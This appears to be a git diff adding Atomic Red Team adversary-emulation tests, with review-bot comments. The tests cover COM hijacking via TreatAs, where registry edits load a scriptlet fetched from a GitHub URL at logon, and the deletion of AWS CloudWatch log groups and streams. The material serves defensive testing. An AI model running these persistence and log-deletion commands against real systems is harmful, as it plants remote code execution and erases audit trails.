@@ -162,4 +164,61 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
+
+
+
+## Atomic Test #4 - COM hijacking via TreatAs
+This test first create a custom CLSID class pointing to the Windows Script Component runtime DLL. This DLL looks for the ScriptletURL key to get the location of the script to execute.
+Then, it hijacks the CLSID for the Work Folders Logon Synchronization to establish persistence on user logon by creating the 'TreatAs' with the malicious CLSID as default value. The
+test is validated by running 'rundll32.exe -sta "AtomicTest"' to avoid logging out.
+
+References:
+
+https://youtu.be/3gz1QmiMhss?t=1251
+
+https://github.com/enigma0x3/windows-operating-system-archaeology
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 33eacead-f117-4863-8eb0-5c6304fbfaa9
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest" /ve /T REG_SZ /d "AtomicTest" /f
+reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest.1.00" /ve /T REG_SZ /d "AtomicTest" /f
+reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest\CLSID" /ve /T REG_SZ /d "{00000001-0000-0000-0000-0000FEEDACDC}" /f
+reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest.1.00\CLSID" /ve /T REG_SZ /d "{00000001-0000-0000-0000-0000FEEDACDC}" /f
+reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}" /f
+reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}" /ve /T REG_SZ /d "AtomicTest" /f
+reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\InprocServer32" /ve /T REG_SZ /d "C:\\WINDOWS\\system32\\scrobj.dll" /f
+reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\InprocServer32" /v "ThreadingModel" /T REG_SZ /d "Apartment" /f
+reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ProgID" /ve /T REG_SZ /d "AtomicTest" /f
+reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ScriptletURL" /ve /T REG_SZ /d "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/src/TreatAs.sct" /f
+reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\VersionIndependentProgID" /ve /T REG_SZ /d "AtomicTest" /f
+
+reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}" /f
+reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}\TreatAs" /ve /T REG_SZ /d "{00000001-0000-0000-0000-0000FEEDACDC}" /f
+
+rundll32.exe -sta "AtomicTest"
+```
+
+#### Cleanup Commands:
+```powershell
+reg delete "HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest" /f
+reg delete "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}" /f
+reg delete "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}" /f
+```
+
+
+
+
+
diff --git a/atomics/T1546.015/T1546.015.yaml b/atomics/T1546.015/T1546.015.yaml
index de990686..d938c90c 100644
--- a/atomics/T1546.015/T1546.015.yaml
+++ b/atomics/T1546.015/T1546.015.yaml
@@ -95,3 +95,42 @@ atomic_tests:
cleanup_command: |-
Remove-Item -Path 'HKCU:\SOFTWARE\Classes\CLSID\#{clsid}' -Recurse -ErrorAction Ignore
name: powershell
+- name: COM hijacking via TreatAs
+ auto_generated_guid: 33eacead-f117-4863-8eb0-5c6304fbfaa9
+ description: |-
+ This test first create a custom CLSID class pointing to the Windows Script Component runtime DLL. This DLL looks for the ScriptletURL key to get the location of the script to execute.
+ Then, it hijacks the CLSID for the Work Folders Logon Synchronization to establish persistence on user logon by creating the 'TreatAs' with the malicious CLSID as default value. The
+ test is validated by running 'rundll32.exe -sta "AtomicTest"' to avoid logging out.
+
+ References:
+
+ https://youtu.be/3gz1QmiMhss?t=1251
+
+ https://github.com/enigma0x3/windows-operating-system-archaeology
+
+ supported_platforms:
+ - windows
+ executor:
+ command: |-
+ reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest" /ve /T REG_SZ /d "AtomicTest" /f
+ reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest.1.00" /ve /T REG_SZ /d "AtomicTest" /f
+ reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest\CLSID" /ve /T REG_SZ /d "{00000001-0000-0000-0000-0000FEEDACDC}" /f
+ reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest.1.00\CLSID" /ve /T REG_SZ /d "{00000001-0000-0000-0000-0000FEEDACDC}" /f
+ reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}" /f
+ reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}" /ve /T REG_SZ /d "AtomicTest" /f
+ reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\InprocServer32" /ve /T REG_SZ /d "C:\\WINDOWS\\system32\\scrobj.dll" /f
+ reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\InprocServer32" /v "ThreadingModel" /T REG_SZ /d "Apartment" /f
+ reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ProgID" /ve /T REG_SZ /d "AtomicTest" /f
+ reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ScriptletURL" /ve /T REG_SZ /d "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/src/TreatAs.sct" /f
+ reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\VersionIndependentProgID" /ve /T REG_SZ /d "AtomicTest" /f
+
+ reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}" /f
+ reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}\TreatAs" /ve /T REG_SZ /d "{00000001-0000-0000-0000-0000FEEDACDC}" /f
+
+ rundll32.exe -sta "AtomicTest"
+
+ cleanup_command: |-
+ reg delete "HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest" /f
+ reg delete "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}" /f
+ reg delete "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}" /f
+ name: powershell
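Review bot: The description (L957-L959) should make the blast radius explicit: the second `reg add` group overrides a real system CLSID in the user's `HKCU\SOFTWARE\Classes\CLSID` hive (L983-L984), so until `cleanup_command` runs every logon of that user presumably activates the scriptlet fetched from the GitHub URL at L980 — add a sentence such as `The hijack remains active for this user until the cleanup command is run.` The text also has grammar slips a reader trips over: `first create` → `first creates`, and `creating the 'TreatAs' with the malicious CLSID` → `creating the 'TreatAs' subkey with the custom CLSID`. The executor depends on outbound access to GitHub at run time (L980) but there is no `dependencies` entry or local copy of `TreatAs.sct`; other tests in this commit add prerequisite checks for their `src` files, and the same pattern would make a failed fetch visible instead of a silent no-op when `rundll32.exe -sta "AtomicTest"` runs.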
diff --git a/atomics/T1546.015/src/TreatAs.sct b/atomics/T1546.015/src/TreatAs.sct
new file mode 100644
index 00000000..c5826f02
--- /dev/null
+++ b/atomics/T1546.015/src/TreatAs.sct
@@ -0,0 +1,22 @@
+
+
@@ -261,4 +265,109 @@ echo Please install the aws-cli and configure your AWS defult profile using: aws
+
+
+
+## Atomic Test #5 - AWS CloudWatch Log Group Deletes
+Creates a new cloudWatch log group in AWS, Upon successful creation it will Delete the group. Attackers can use this technique to evade defenses by
+deleting the log stream. Once it is deleted, the logs created by the attackers will not be logged. https://www.elastic.co/guide/en/security/current/aws-cloudwatch-log-group-deletion.html#aws-cloudwatch-log-group-deletion
+
+**Supported Platforms:** Iaas:aws
+
+
+**auto_generated_guid:** 89422c87-b57b-4a04-a8ca-802bb9d06121
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| cloudwatch_log_group_name | Name of the cloudWatch log group | String | log-test|
+| region | Name of the region | String | us-east-1|
+
+
+#### Attack Commands: Run with `sh`!
+
+
+```sh
+aws logs create-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json
+echo "*** Log Group Created ***"
+aws logs delete-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json
+echo "*** Log Group Deleted ***"
+```
+
+
+
+
+#### Dependencies: Run with `sh`!
+##### Description: Check if ~/.aws/credentials file has a default stanza is configured
+##### Check Prereq Commands:
+```sh
+cat ~/.aws/credentials | grep "default"
+```
+##### Get Prereq Commands:
+```sh
+echo Please install the aws-cli and configure your AWS defult profile using: aws configure
+```
+
+
+
+
+
+
+
+## Atomic Test #6 - AWS CloudWatch Log Stream Deletes
+Creates a new cloudWatch log stream in AWS, Upon successful creation it will Delete the stream. Attackers can use this technique to evade defenses by
+deleting the log stream. Once it is deleted, the logs created by the attackers will not be logged. https://www.elastic.co/guide/en/security/current/aws-cloudwatch-log-stream-deletion.html
+
+**Supported Platforms:** Iaas:aws
+
+
+**auto_generated_guid:** 33ca84bc-4259-4943-bd36-4655dc420932
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| cloudwatch_log_group_name | Name of the cloudWatch log group | String | test-logs|
+| cloudwatch_log_stream_name | Name of the cloudWatch log stream | String | 20150601|
+| region | Name of the region | String | us-west-2|
+
+
+#### Attack Commands: Run with `sh`!
+
+
+```sh
+aws logs create-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json
+echo "*** Log Group Created ***"
+aws logs create-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name}
+echo "*** Log Stream Created ***"
+aws logs delete-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name}
+echo "*** Log Stream Deleted ***"
+aws logs delete-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json
+echo "*** Log Group Deleted ***"
+```
+
+
+
+
+#### Dependencies: Run with `sh`!
+##### Description: Check if ~/.aws/credentials file has a default stanza is configured
+##### Check Prereq Commands:
+```sh
+cat ~/.aws/credentials | grep "default"
+```
+##### Get Prereq Commands:
+```sh
+echo Please install the aws-cli and configure your AWS defult profile using: aws configure
+```
+
+
+
+
diff --git a/atomics/T1562.008/T1562.008.yaml b/atomics/T1562.008/T1562.008.yaml
index e029bfb7..078f6b57 100644
--- a/atomics/T1562.008/T1562.008.yaml
+++ b/atomics/T1562.008/T1562.008.yaml
@@ -318,6 +318,38 @@ atomic_tests:
name: sh
elevation_required: false
- name: AWS - CloudWatch Log Stream Deletes
+ auto_generated_guid: 89422c87-b57b-4a04-a8ca-802bb9d06121
+ description: |
+ Creates a new cloudWatch log group in AWS, Upon successful creation it will Delete the group. Attackers can use this technique to evade defenses by
+ deleting the log stream. Once it is deleted, the logs created by the attackers will not be logged. https://www.elastic.co/guide/en/security/current/aws-cloudwatch-log-group-deletion.html#aws-cloudwatch-log-group-deletion
+ supported_platforms:
+ - iaas:aws
+ input_arguments:
+ cloudwatch_log_group_name:
+ description: Name of the cloudWatch log group
+ type: String
+ default: "log-test"
+ region:
+ description: Name of the region
+ type: String
+ default: "us-east-1"
+ dependencies:
+ - description: |
+ Check if ~/.aws/credentials file has a default stanza is configured
+ prereq_command: |
+ cat ~/.aws/credentials | grep "default"
+ get_prereq_command: |
+ echo Please install the aws-cli and configure your AWS defult profile using: aws configure
+ executor:
+ command: |
+ aws logs create-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json
+ echo "*** Log Group Created ***"
+ aws logs delete-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json
+ echo "*** Log Group Deleted ***"
+ cleanup_command:
+ name: sh
+ elevation_required: false
+- name: AWS CloudWatch Log Stream Deletes
auto_generated_guid: 33ca84bc-4259-4943-bd36-4655dc420932
description: |
Creates a new cloudWatch log stream in AWS, Upon successful creation it will Delete the stream. Attackers can use this technique to evade defenses by
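Review bot: The new test body (L1115-L1145) is inserted directly beneath the existing context line `- name: AWS - CloudWatch Log Stream Deletes` (L1114), so in the resulting file the log-group test carrying GUID `89422c87-b57b-4a04-a8ca-802bb9d06121` is titled as a log-stream test, while the original stream test (GUID `33ca84bc-…`, L1147) is headed by the newly added `- name: AWS CloudWatch Log Stream Deletes` (L1146); the group test needs its own list-item name before L1115, `- name: AWS CloudWatch Log Group Deletes`, with L1115-L1145 indented under it and L1114 then removed. The description at L1117-L1118 also says `deleting the log stream` although the commands at L1139-L1141 create and delete a log group — change it to `deleting the log group`. `cleanup_command:` at L1143 is a bare empty value, which parses as null rather than an empty string; either drop the key or write `cleanup_command: ""`, matching how the rest of the file handles tests without cleanup.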
diff --git a/atomics/T1592.001/T1592.001.md b/atomics/T1592.001/T1592.001.md
new file mode 100644
index 00000000..666f2943
--- /dev/null
+++ b/atomics/T1592.001/T1592.001.md
@@ -0,0 +1,26 @@
+# T1592.001 - Gather Victim Host Information: Hardware
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1592/001/)
+
Adversaries may use powershell script to gather information about the system, configuration, and even mounted hardware on the target host. + + Dark Crystal Rat use several technique to gather hardware information of the compromised host like gathering the microphone, CPU, GPU, camera and many as part of its data collection and backdoor capabilities. ++ +## Atomic Tests + +- [Atomic Test #1 - Query Registry](#atomic-test-1---Enumerate PlugNPlay Camera) + + +